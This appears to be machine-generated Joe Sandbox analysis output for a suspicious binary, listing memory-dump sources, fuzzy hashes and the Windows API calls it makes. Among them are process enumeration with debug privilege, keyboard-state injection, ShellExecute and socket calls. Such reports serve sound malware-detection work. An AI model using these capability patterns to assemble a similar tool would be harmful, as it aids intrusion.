                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                            • String ID: SeDebugPrivilege
                                                                            • API String ID: 2533919879-2896544425
                                                                            • Opcode ID: 5bde5c1240aa70a9cdc0aabf18124a9b95b04e28b27330459b579a909df545c3
                                                                            • Instruction ID: 30acf6d761cbe3e928ae552d8206bcd3d4fb3debe9c9d131f1b50f59360a4ad0
                                                                            • Opcode Fuzzy Hash: 5bde5c1240aa70a9cdc0aabf18124a9b95b04e28b27330459b579a909df545c3
                                                                            • Instruction Fuzzy Hash: 0341CC312603019FDB26EF24CCA5F6DB7A4AF80314F488059F94A5F2C2DBB0A924CF95
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 002D4802
                                                                            • LoadStringW.USER32(00000000), ref: 002D4809
                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 002D481F
                                                                            • LoadStringW.USER32(00000000), ref: 002D4826
                                                                            • _wprintf.LIBCMT ref: 002D484C
                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002D486A
                                                                            Strings
                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 002D4847
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                            • API String ID: 3648134473-3128320259
                                                                            • Opcode ID: 9cef8b771d832a6df435242d5c2095699138253ae74d53e192ddf671c088f525
                                                                            • Instruction ID: 29334e501c6d0b56139f92d57584a651e937f9fe06ec001b72fa61008fc70a1f
                                                                            • Opcode Fuzzy Hash: 9cef8b771d832a6df435242d5c2095699138253ae74d53e192ddf671c088f525
                                                                            • Instruction Fuzzy Hash: 7D016DF690124C7FE716ABA09D89FF7736DEB08300F4005A6BB49E2141EB749E948B75
                                                                            APIs
                                                                              • Part of subcall function 002729E2: GetWindowLongW.USER32(?,000000EB), ref: 002729F3
                                                                            • GetSystemMetrics.USER32(0000000F), ref: 002FDB42
                                                                            • GetSystemMetrics.USER32(0000000F), ref: 002FDB62
                                                                            • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 002FDD9D
                                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 002FDDBB
                                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 002FDDDC
                                                                            • ShowWindow.USER32(00000003,00000000), ref: 002FDDFB
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 002FDE20
                                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 002FDE43
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                            • String ID:
                                                                            • API String ID: 1211466189-0
                                                                            • Opcode ID: 02441ac8a6dc6c6c419e0567f17318b7bd823198affc24ae3a22f77f5f5b615b
                                                                            • Instruction ID: a01308157711339629d8d249e39b9da131c889c16c833c7d22a577d43d3979f3
                                                                            • Opcode Fuzzy Hash: 02441ac8a6dc6c6c419e0567f17318b7bd823198affc24ae3a22f77f5f5b615b
                                                                            • Instruction Fuzzy Hash: B7B19B3160021AEBDF14CF69C9D57BDBBB2BF04741F08817AEE489E255D771A960CB90
                                                                            APIs
                                                                              • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
                                                                              • Part of subcall function 002F147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002F040D,?,?), ref: 002F1491
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002F044E
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharConnectRegistryUpper_memmove
                                                                            • String ID:
                                                                            • API String ID: 3479070676-0
                                                                            • Opcode ID: 423581285d22bbe2166354c2e220847b3d1cf8a0aeaccb991948219009c57b95
                                                                            • Instruction ID: bd90fb819d7d07ff05f8134cff00dca7271db46d1afce69130188a3c3ded5912
                                                                            • Opcode Fuzzy Hash: 423581285d22bbe2166354c2e220847b3d1cf8a0aeaccb991948219009c57b95
                                                                            • Instruction Fuzzy Hash: 2CA17A302242059FCB11EF14C891F3EB7E9AF84354F14892DFA9A87292DB71E965CF42
                                                                            APIs
                                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,002AC508,00000004,00000000,00000000,00000000), ref: 00272E9F
                                                                            • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,002AC508,00000004,00000000,00000000,00000000,000000FF), ref: 00272EE7
                                                                            • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,002AC508,00000004,00000000,00000000,00000000), ref: 002AC55B
                                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,002AC508,00000004,00000000,00000000,00000000), ref: 002AC5C7
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ShowWindow
                                                                            • String ID:
                                                                            • API String ID: 1268545403-0
                                                                            • Opcode ID: 6379e87f95b0538b9dd4586ab98d6c6147094e7a41fc4d497aeaf2673dcdf23a
                                                                            • Instruction ID: 163e9a764aa0926a2cddfb595caace69ed1fe5bafe1fd748b5095da6718a2c5c
                                                                            • Opcode Fuzzy Hash: 6379e87f95b0538b9dd4586ab98d6c6147094e7a41fc4d497aeaf2673dcdf23a
                                                                            • Instruction Fuzzy Hash: F3410C30A34685DBD73A8F2CCC88B6A7BD6AB86300F64C41DF48B56560CB71B868DB11
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 002D7698
                                                                              • Part of subcall function 00290FE6: std::exception::exception.LIBCMT ref: 0029101C
                                                                              • Part of subcall function 00290FE6: __CxxThrowException@8.LIBCMT ref: 00291031
                                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 002D76CF
                                                                            • EnterCriticalSection.KERNEL32(?), ref: 002D76EB
                                                                            • _memmove.LIBCMT ref: 002D7739
                                                                            • _memmove.LIBCMT ref: 002D7756
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 002D7765
                                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 002D777A
                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 002D7799
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                            • String ID:
                                                                            • API String ID: 256516436-0
                                                                            • Opcode ID: 44e28336ede7d2ceff2b242b38d7f58c9c083a18fbd410ef901c435e96065bc8
                                                                            • Instruction ID: 1cf3b14879cc43c5e37003774519ddc25b889c43c0785d2c7b3cdff4dbc89dd7
                                                                            • Opcode Fuzzy Hash: 44e28336ede7d2ceff2b242b38d7f58c9c083a18fbd410ef901c435e96065bc8
                                                                            • Instruction Fuzzy Hash: D1319E31914209EBDF11EF65DC85EAEB77CEF45700F1440A6FD04AA246DB309E20CBA0
                                                                            APIs
                                                                            • DeleteObject.GDI32(00000000), ref: 002F6810
                                                                            • GetDC.USER32(00000000), ref: 002F6818
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002F6823
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 002F682F
                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 002F686B
                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 002F687C
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,002F964F,?,?,000000FF,00000000,?,000000FF,?), ref: 002F68B6
                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 002F68D6
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 3864802216-0
                                                                            • Opcode ID: 99176ac379c20079ff62097515107ecf16b68028885da7f63b2edac9c9c958a9
                                                                            • Instruction ID: 7d732dc2cbf82bd7c96f8a8f95c26fdc4221d29f0ca188fd89537e3fefe32497
                                                                            • Opcode Fuzzy Hash: 99176ac379c20079ff62097515107ecf16b68028885da7f63b2edac9c9c958a9
                                                                            • Instruction Fuzzy Hash: 08316D72111214BFEB158F10CC9AFEA3BADEF497A1F044065FE089A291C6759851CBB0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _memcmp
                                                                            • String ID:
                                                                            • API String ID: 2931989736-0
                                                                            • Opcode ID: f1c0c87cdc115253aa5105cb494fb569944ff77edb60c80e28a85b3a162fd1ed
                                                                            • Instruction ID: 351d5a9928dae8fea59d6ee27008b98c2b70d2e6f1c0ca72667d574c5d97e21b
                                                                            • Opcode Fuzzy Hash: f1c0c87cdc115253aa5105cb494fb569944ff77edb60c80e28a85b3a162fd1ed
                                                                            • Instruction Fuzzy Hash: 96210A73A751077AE606B9114D52FBB775CDE10744F28022CFD0EA6282E750DE35CAA1
                                                                            APIs
                                                                              • Part of subcall function 00274D37: __itow.LIBCMT ref: 00274D62
                                                                              • Part of subcall function 00274D37: __swprintf.LIBCMT ref: 00274DAC
                                                                              • Part of subcall function 0028436A: _wcscpy.LIBCMT ref: 0028438D
                                                                            • _wcstok.LIBCMT ref: 002DF2D7
                                                                            • _wcscpy.LIBCMT ref: 002DF366
                                                                            • _memset.LIBCMT ref: 002DF399
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                            • String ID: X
                                                                            • API String ID: 774024439-3081909835
                                                                            • Opcode ID: fc4702a92e109793b1c3f10404e43366d9f11b088fccb15e20858993a9910201
                                                                            • Instruction ID: ca942d20edf679f42154f22148641cd474f23babb8932fccdd3ce0f632f2f0ff
                                                                            • Opcode Fuzzy Hash: fc4702a92e109793b1c3f10404e43366d9f11b088fccb15e20858993a9910201
                                                                            • Instruction Fuzzy Hash: 1BC19D755243419FC754EF24D981A6BB7E8AF84314F00492EF89A873A2DB70EC65CF82
                                                                            APIs
                                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 002E72EB
                                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 002E730C
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 002E731F
                                                                            • htons.WSOCK32(?,?,?,00000000,?), ref: 002E73D5
                                                                            • inet_ntoa.WSOCK32(?), ref: 002E7392
                                                                              • Part of subcall function 002CB4EA: _strlen.LIBCMT ref: 002CB4F4
                                                                              • Part of subcall function 002CB4EA: _memmove.LIBCMT ref: 002CB516
                                                                            • _strlen.LIBCMT ref: 002E742F
                                                                            • _memmove.LIBCMT ref: 002E7498
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                            • String ID:
                                                                            • API String ID: 3619996494-0
                                                                            • Opcode ID: 2dc88fcb6823076c53b302fd3d1216527fad5933435b73cee16d754518d01e74
                                                                            • Instruction ID: 2076a7a379a536385ab6d5a1693b1edcc5bb1772d2c6c3a37705cdea3b870518
                                                                            • Opcode Fuzzy Hash: 2dc88fcb6823076c53b302fd3d1216527fad5933435b73cee16d754518d01e74
                                                                            • Instruction Fuzzy Hash: 1B81F071128240ABC710EF25CC91F6BB7B8AF84714F50851DF9499B2D2EB70DD21CB92
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1b46d4c785e22cf0954ae6834f5b7034022a2e7ed0e1fcf408ab0377ce9a2677
                                                                            • Instruction ID: b3652c517290d7b979305795b7e44ef13ebd431c8abbaa5e226e1583b2ff7c47
                                                                            • Opcode Fuzzy Hash: 1b46d4c785e22cf0954ae6834f5b7034022a2e7ed0e1fcf408ab0377ce9a2677
                                                                            • Instruction Fuzzy Hash: BB715E3492010AEFDB09CF58CC45ABEBB79FF86314F14C159F919AA251C770AA61CFA1
                                                                            APIs
                                                                            • IsWindow.USER32(00C65698), ref: 002FBA5D
                                                                            • IsWindowEnabled.USER32(00C65698), ref: 002FBA69
                                                                            • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 002FBB4D
                                                                            • SendMessageW.USER32(00C65698,000000B0,?,?), ref: 002FBB84
                                                                            • IsDlgButtonChecked.USER32(?,?), ref: 002FBBC1
                                                                            • GetWindowLongW.USER32(00C65698,000000EC), ref: 002FBBE3
                                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 002FBBFB
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                            • String ID:
                                                                            • API String ID: 4072528602-0
                                                                            • Opcode ID: 28b7a3f47fefbc6ed678e8a1e5ab7b7674d6d1962f2d8701b94f9191ee2a9e0a
                                                                            • Instruction ID: 283f5ed78af104ccfe40efe27fbd0c1fe64c053962f31fbf694fe09be756a220
                                                                            • Opcode Fuzzy Hash: 28b7a3f47fefbc6ed678e8a1e5ab7b7674d6d1962f2d8701b94f9191ee2a9e0a
                                                                            • Instruction Fuzzy Hash: 8D71B038A1520EAFDB279F54C8D4FBAF7B9EF49380F144069EA5597261CB31AC60CB50
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 002EFB31
                                                                            • _memset.LIBCMT ref: 002EFBFA
                                                                            • ShellExecuteExW.SHELL32(?), ref: 002EFC3F
                                                                              • Part of subcall function 00274D37: __itow.LIBCMT ref: 00274D62
                                                                              • Part of subcall function 00274D37: __swprintf.LIBCMT ref: 00274DAC
                                                                              • Part of subcall function 0028436A: _wcscpy.LIBCMT ref: 0028438D
                                                                            • GetProcessId.KERNEL32(00000000), ref: 002EFCB6
                                                                            • CloseHandle.KERNEL32(00000000), ref: 002EFCE5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                            • String ID: @
                                                                            • API String ID: 3522835683-2766056989
                                                                            • Opcode ID: 01130f6f4c4bed5cae3e1b81368a0805a77be7a14fa7dd0b38d0b2765e1baeb9
                                                                            • Instruction ID: 9f3c2d991d783e148e44f652fbf53c753edbf80bcfc9262d56df28e562c702a5
                                                                            • Opcode Fuzzy Hash: 01130f6f4c4bed5cae3e1b81368a0805a77be7a14fa7dd0b38d0b2765e1baeb9
                                                                            • Instruction Fuzzy Hash: 6A61D275A10619DFCB15EF95C590AAEB7F4FF08314F20846AE849AB391CB30AD61CF90
                                                                            APIs
                                                                            • GetParent.USER32(?), ref: 002D178B
                                                                            • GetKeyboardState.USER32(?), ref: 002D17A0
                                                                            • SetKeyboardState.USER32(?), ref: 002D1801
                                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 002D182F
                                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 002D184E
                                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 002D1894
                                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 002D18B7
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                            • String ID:
                                                                            • API String ID: 87235514-0
                                                                            • Opcode ID: 64e58421cac8ce27dedb9b52db5cea4f618150782298bf6556d6215815b64bf6
                                                                            • Instruction ID: 502b80ec4c25496abf3928682d6277febaeee05f8b5015d2bf4c4840e2e458f7
                                                                            • Opcode Fuzzy Hash: 64e58421cac8ce27dedb9b52db5cea4f618150782298bf6556d6215815b64bf6
                                                                            • Instruction Fuzzy Hash: 6F51D5A0A287D63DFB368A34CC55BB6BEE95B06300F08458AE0D586ED2C3949CF4E750
                                                                            APIs
                                                                            • GetParent.USER32(00000000), ref: 002D15A4
                                                                            • GetKeyboardState.USER32(?), ref: 002D15B9
                                                                            • SetKeyboardState.USER32(?), ref: 002D161A
                                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 002D1646
                                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 002D1663
                                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 002D16A7
                                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 002D16C8
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                            • String ID:
                                                                            • API String ID: 87235514-0
                                                                            • Opcode ID: d597189aee0fcba1ed8fee01a7f9efde4ba3926e09e87d634d7be2d765a19deb
                                                                            • Instruction ID: e02a1538c02bed12f3052e87822a88b3866754f6d12c6cfa526cb98749d6b922
                                                                            • Opcode Fuzzy Hash: d597189aee0fcba1ed8fee01a7f9efde4ba3926e09e87d634d7be2d765a19deb
                                                                            • Instruction Fuzzy Hash: 395118A05687D63DFB368B248C51B7ABEAD5B06300F0C848BE0D546EC2C694ECB4D790
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsncpy$LocalTime
                                                                            • String ID:
                                                                            • API String ID: 2945705084-0
                                                                            • Opcode ID: a82dda0b28188212f0bd710f0db894837ba609a4426f353092e1296ba890341d
                                                                            • Instruction ID: 09539dc9f81157aaa1368592fc58c9634e21b692b2b9d9fea2ab2da0f3ef8d38
                                                                            • Opcode Fuzzy Hash: a82dda0b28188212f0bd710f0db894837ba609a4426f353092e1296ba890341d
                                                                            • Instruction Fuzzy Hash: 7D417065C3062875CF11FBF48886ACFB7BDAF04310F518856E909E3211E674A6298BA6
                                                                            APIs
